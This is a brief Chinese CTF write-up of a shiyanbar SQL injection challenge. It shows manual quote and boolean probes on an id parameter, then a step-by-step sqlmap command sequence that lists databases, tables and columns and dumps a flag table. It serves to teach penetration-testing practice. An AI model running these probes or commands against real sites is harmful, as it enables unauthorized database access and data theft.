今天的题目好难,过不了。。。只能sqlmap了。。。
1、首先测1和1’、1'and'1=1,各种正确语法都出现hello
image.png
2、然后错误数据的话就会报错。。。感觉没有约束,就是直接全过滤了,不回结果。
3、直接sqlmap吧
(1)查库
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
结果凉凉
image.png
(2)于是按照提示后面加入--random-agent
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs --random-agent
image.png
还是不行。。。看来这题不简单了啊
(3)又在后面加了个后缀--keep-alive
sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs --random-agent --keep-alive
image.png
好家伙。。不给我连了
4、好在我有win7虚拟机,在里面开了最新的sqlmap...终于成功(win中python2运行的sqlmap)
(1)查库
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
image.png
(2)查表
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables
image.png
(3)查字段
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag --columns
这里有一个tips是可以设置线程数,于是后缀加了--threads 8,变得快很多
image.png
(4)查值
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump --threads 8
image.png
牛逼的操作等我会了再补。。。
网友评论